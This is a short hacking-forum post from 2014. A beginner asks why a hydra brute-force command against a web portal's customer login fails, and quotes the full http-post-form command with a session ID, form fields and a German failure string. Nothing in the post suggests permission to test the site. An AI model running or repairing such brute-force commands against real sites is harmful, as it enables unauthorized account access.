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Messages - fettmaker

Pages: [1]
Hacking and Security / bruteforce a website
« on: December 09, 2014, 04:36:51 am »
Hello guys

Is this page  vulnerable for brute force atack?:

Im a noob, and i try quite a while to bruteforce it with kalis hydra. But  in vain.
here is my code:
   hydra -l Test -P /root/upc http-post-form "/register-webapp/register.portal;JSESSIONID_SCP=Lw0HJFJGJLGJL12TScqDvJMhQdbnbdGW3w7Vrt6KRgSvmxQ5zZNh!518791670?_nfpb=true&_windowLabel=login_content&login_content_actionOverride=%2Fportlets%2Flogin%2FvalidateCustomer.php:login_content{actionForm.lastname}=^USER^&login_content{actionForm.customerNumber}=^PASS^:ungültige Kundennummer"

and here the eroor: bash: !518791670: event not found

I used burpsuite to capture and used also html page for any other informations

please help

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